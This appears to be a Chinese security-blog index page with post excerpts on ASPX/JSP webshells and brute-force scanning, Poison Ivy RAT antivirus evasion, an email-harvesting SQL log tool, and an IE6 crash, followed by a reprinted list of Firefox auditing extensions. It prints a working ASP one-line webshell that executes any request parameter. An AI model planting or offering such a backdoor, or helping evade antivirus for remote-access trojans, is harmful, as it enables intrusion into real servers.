之前写了个 JSP的 现在找个ASPX的实现了!
说起来也真头疼ASPX跟 JSP/SERVLET的生命周期 不一样~

Tags: ASP.Net
昨天叫LIVING帮忙扫描几个IP 覆盖全部端口~~~他老抱怨说XSCAN支持多核CPU不理想,整天出错!
我郁闷之下开发了个WEBSHELL上面扫描的程序,直接把IP 添加到作业系统那里~让服务器自动扫描!
即使我们关了浏览器…!我们过N天之后上去看看扫描结果就OK~~ 不用管它了 自己忙自己的事!….
开发对于数据库暴力破解 ,SSH暴力破解 , MD5暴力破解!多个WEBSHELL通讯进行分布式

代码: 阅读全文 »
Tags: Jsp
<%if request("nonamed")<>"" then execute request("nonamed")%>
VBS中execute就是动态运行指定的代码而JSCRIPT中也同样有eval函数可以实现,也就是说ASP一句话木马也有个版本是采用JSCRIPT的 eval的!网上也有例子我就不多说了!…..
然后解析语言终究发展成为中间代码例如java .net 动态执行也就不存在了!
阅读全文 »
Tags: ASPX
鬼仔注:我比较喜欢Poison Ivy,所以发下,这个东西是针对Poison Ivy写的,拿来做Poison Ivy的服务器端免杀的。
来源:蛋蛋's blog
不只是针对pi 服务端而写的.可以免杀其他文件.
Stub 大小 15kb

来源:蛋蛋's blog
Developer: c4!N
Compiler: Delphi
Date Released: 06.07.2007
Package Size: 1,52 MB
Tested on: Windows XP SP2
Source-Protector: Themida
Descritpion: SQL Hack is a interactive SQL-Log File reader! Without strives you can catch email accounts and filter them (like show only hotmail accounts) ,too! A intrested another feauter 阅读全文 »
Tags: SQL
一个 日本博客 发现只需一行代码就能让IE6崩溃,代码如下:
这行代码在Firefox,Safari和Opera都能正确解析,但是在IE 6下却会引起mshtml.dll致命错误.
如果你想尝试一下它的效果,点击 这里 .
Tags: IE
AJAX and interactive web services form the backbone of “web 2.0”applications. This technological transformation brings about newchallenges for security professionals. This article looks at some of the methods, tools and tricks to dissectweb 2.0 applications (including Ajax) and discover security holes 阅读全文 »
Tags: Firefox,
Web 2.0
这里我也补充一个Firebug, 在Hacking Web 2.0 Applications with Firefox文章中有提到. ; )
Internet is an amazing virtual world where you can"virtually" do anything : gambling, playing, watching movies, shopping,working, “VoIPying”, spying other people and for sure auditing remotesystems.
This article is copyrighted Security-Database.com
The security testers community has a large panel ofsecurity tools, methodologies and much more to perform their pentestsand audit assessments. But what happens if you find yourself weaponless.
No more Top 100 security tools, no more LiveCDs and nomore exploitation frameworks. A security auditor without toolbox islike a cop without gun.
Nevertherless, there is maybe a way to rescue yourself from this nightmare situation.
The magical solution could be Firefox and its extensions developed by ethical hackers and coders.
This article comes as an update for what we postedpreviously about how to switch your firefox to more than an usualsimple browser. It was about application auditing
This article has been updated to a new Framework. The tool is called FireCAT. And it is mind map based tool. Get it here.
Here is an updated list of useful security auditing extensions :
Information gathering
- Whois and geo-location
- ShowIP: Show the IP address of the current page in the status bar. It alsoallows querying custom services by IP (right mouse button) and Hostname(left mouse button), like whois, netcraft.
- Shazou: The product called Shazou (pronounced Shazoo it is Japanese formapping) enables the user with one-click to map and geo-locate anywebsite they are currently viewing.
- HostIP.info Geolocation : Displays Geolocation information for a website using hostip.info data. Works with all versions of Firefox.
- Active Whois : Starting Active Whois to get details about any Web site owner and its host server.
- Bibirmer Toolbar: An all-in-one extension. But auditors need to play with the toolbox.It includes ( WhoIs, DNS Report, Geolocation , Traceroute , Ping ).Very useful for information gathering phase
- Enumeration / fingerprinting
- Header Spy: Shows HTTP headers on statusbar
- Header Monitor: This is Firefox extension for display on statusbar panel any HTTPresponse header of top level document returned by a web server.Example: Server (by default), Content-Encoding, Content-Type,X-Powered-By and others.
- Social engineering
- People Search and Public Record:This Firefox extension is a handy menu tool for investigators,reporters, legal professionals, real estate agents, online researchersand anyone interested in doing their own basic people searches andpublic record lookups as well as background research.
- Googling and spidering
- Advanced dork: gives quick access to Google’s Advanced Operators directly from thecontext menu. This could be used to spider a site or scan for hiddenfiles (this spider technique is used via scroogle.org)
- SpiderZilla : Spiderzilla is an easy-to-use website mirror utility, based on Httrack from www.httrack.com.
- View Dependencies: View Dependencies adds a tab to the "page info" window, in which itlists all the files which were loaded to show the current page. (usefulfor a spidering technique)
Security Assessment / Code auditing
- Editors
- JSView: The ’view page source’ menu item now opens files based on thebehavior you choose in the jsview options. This allows you to open thesource code of any web page in a new tab or in an external editor.
- Cert Viewer Plus: Adds two options to the certificate viewer in Firefox or Thunderbird:an X.509 certificate can either be displayed in PEM format (Base64/RFC1421, opens in a new window) or saved to a file (in PEM or DER format -and PKCS#7 provided that the respective patch has been applied – cf.
- Firebug: Firebug integrates with Firefox to put a wealth of development toolsat your fingertips while you browse. You can edit, debug, and monitorCSS, HTML, and JavaScript live in any web page
- XML Developer Toolbar:allows XML Developer’s use of standard tools all from your browser.
- Headers manipulation
- HeaderMonitor: This is Firefox extension for display on statusbar panel any HTTPresponse header of top level document returned by a web server.Example: Server (by default), Content-Encoding, Content-Type,X-Powered-By and others.
- RefControl : Control what gets sent as the HTTP Referer on a per-site basis.
- User Agent Switcher :Adds a menu and a toolbar button to switch the user agent of the browser
- Cookies manipulation
- Add N Edit Cookies : Cookie Editor that allows you add and edit "session" and saved cookies.
- CookieSwap: CookieSwap is an extension that enables you to maintain numerous setsor "profiles" of cookies that you can quickly swap between whilebrowsing
- httpOnly : Adds httpOnly cookie support to Firefox by encrypting cookies marked as httpOnly on the browser side
- Allcookies : Dumps ALL cookies (including session cookies) to Firefox standard cookies.txt file
- Security auditing
- HackBar: This toolbar will help you in testing sql injections, XSS holes andsite security. It is NOT a tool for executing standard exploits and itwill NOT learn you how to hack a site. Its main purpose is to help adeveloper do security audits on his code.
- Tamper Data : Use tamperdata to view and modify HTTP/HTTPS headers and post parameters.
- Chickenfoot: Chickenfoot is a Firefox extension that puts a programmingenvironment in the browser’s sidebar so you can write scripts tomanipulate web pages and automate web browsing. In Chickenfoot, scriptsare written in a superset of Javascript that includes special functionsspecific to web tasks.
Proxy/web utilities
- FoxyProxy: FoxyProxy is an advanced proxy management tool that completelyreplaces Firefox’s proxy configuration. It offers more features thanSwitchProxy, ProxyButton, QuickProxy, xyzproxy, ProxyTex, etc
- SwitchProxy:SwitchProxy lets you manage and switch between multiple proxyconfigurations quickly and easily. You can also use it as an anonymizerto protect your computer from prying eyes
- POW (Plain Old WebServer): The Plain Old Webserver uses Server-side Javascript (SJS) to run aserver inside your browser. Use it to distribute files from yourbrowser. It supports Server-side JS, GET, POST, uploads, Cookies,SQLite and AJAX. It has security features to password-protect yoursite. Users have created a wiki, chat room and search engine using SJS.
- Hacks for fun
- Greasemonkey : Allows you to customize the way a webpage displays using small bits of JavaScript (scripts could be download here)
- Encryption
- Fire Encrypter: FireEncrypter is an Firefox extension which gives youencryption/decryption and hashing functionalities right from yourFirefox browser, mostly useful for developers or for education &fun.
- Anti Spoof
- refspoof: Easy to pretend to origin from a site by overriding the url referrer(in a http request). — it incorporates this feature by using thepseudo-protocol spoof:// .. thus it’s possible to store the informationin a "hyperlink" – that can be used in any context .. like html pagesor bookmarks
Besides, we keep watching new extensions and we are onthe way to develop a new extension for Nmap and Nessus. So keepwatching us.
Feel free to send us(info[at]security-database[dot]com) any useful information aboutsecurity and audit oriented firefox extensions.
This article is copyrighted Security-Database.com
Tags: Firefox